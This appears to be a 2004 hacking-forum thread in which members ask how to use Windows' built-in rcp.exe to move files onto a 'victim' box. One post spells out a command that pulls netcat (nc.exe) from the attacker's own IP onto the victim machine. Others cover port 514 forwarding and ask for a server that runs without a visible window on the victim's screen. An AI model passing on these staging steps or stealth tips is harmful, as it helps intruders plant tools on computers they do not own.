MxMx
Aug 31 2004, 07:52 AM
lo me again ..
how does this RPC file transfer command work?
just like ftp?
srry..
thanks
BuzzDee
Aug 31 2004, 08:59 AM
never heard of rpc transfer

but when u r talking of rcp then just download the file i attached. it contains an rcp server + a tutorial how to use it (its really easy

)
greetz go out to executor for the tutorial!
peace
aba
Aug 31 2004, 09:34 AM
you can use ftp or tftp it's simply and easy
ryoggi
Aug 31 2004, 09:49 AM
| QUOTE (BuzzDee @ Aug 31 2004, 08:59 AM) |
never heard of rpc transfer 
but when u r talking of rcp then just download the file i attached. it contains an rcp server + a tutorial how to use it (its really easy )
greetz go out to executor for the tutorial!
peace |
I'm try to undertsand but i don't arrive, how it can send file on the victim host if the rcp server isn't set up on the victim host or if there is no rcp client on the victime host ???
How does it work ?
BBQ CD
Aug 31 2004, 10:00 AM
just as aba said ... use tftp / ftp - windows help will let u know how to use it on a box
ryoggi
Aug 31 2004, 10:04 AM
| QUOTE (BBQ CD @ Aug 31 2004, 10:00 AM) |
| just as aba said ... use tftp / ftp - windows help will let u know how to use it on a box |
Stop to be idiot he know how ftp/tftp works don't post lame reply's like this dude...
BuzzDee
Aug 31 2004, 10:52 AM
ryoggi read the tut! its EASY so pleeeeze... o_O
braini
Aug 31 2004, 11:11 AM
buzzdee
thnx for providing this nice tut..
didnt know this was working;] thnx
ryoggi
Aug 31 2004, 12:18 PM
| QUOTE (BuzzDee @ Aug 31 2004, 10:52 AM) |
| ryoggi read the tut! its EASY so pleeeeze... o_O |
erggg, if i ask you that is because i've read the tut's.
It's easy to use but i would know how it's work : port, protocol, file tranfering type....
globey
Aug 31 2004, 12:22 PM
| QUOTE (aba @ Aug 31 2004, 09:34 AM) |
| you can use ftp or tftp it's simply and easy |
easy and simply but sometimes not working :\
BlaStA
Aug 31 2004, 12:55 PM
C:\>fport | findstr "qvt"
996 QVTNET32 -> 514 TCP C:\qvt32\QVTNET32.EXE
996 QVTNET32 -> 1038 UDP C:\qvt32\QVTNET32.EXE
_______________^^ Port Numbers
I don't know which of them it actually uses.
BuzzDee
Aug 31 2004, 01:38 PM
ryoggi sry but i dont know what ur question aims at. dont u manage to transfer files via rcp? be a bit more precise
MxMx
Sep 1 2004, 08:34 AM
yeah ..
doesnt seem to work

I did everything you said in your tut but when I try to transfer file
RCP -b IP:RCP.txt File.ext
it says " connection-timed out"
can anyone help me plz
BlaStA
Sep 1 2004, 08:47 AM
You have to start the RCP-Server on YOUR machine and then execute on the victim's box rcp -b yourip.User:nc.exe c:\nc.exe or something like this. That's the way I understood the tutorial ...
MxMx
Sep 1 2004, 09:29 AM
yeah I know mate..
ninar12
Sep 8 2004, 02:56 AM
u should port-forward port 514 on ur home network
DerangeD
Sep 8 2004, 03:18 AM
rcp.exe is a file that is standard in c:\windows\system32\ like mshta.exe , .... . Thats why you only need to start server local or remote (as my isp blocks all ports under 1024 i have do start a rcp server on a other box for using this method) , still yet another fast way of getting those files on the box !
but isnt there a cmd based rcp server floating around ? Cause the one i got is gui

Would be much more intresting if you could execute it without a gui windows popping up on the box .

using qvt32bit.exe atm
TIA.
ninar12
Sep 8 2004, 03:50 AM
@deranged:
if searched the whole net 4 a commandline server
but never found one
if someone can provide one it would be very nais
or a tip 4 the coding section
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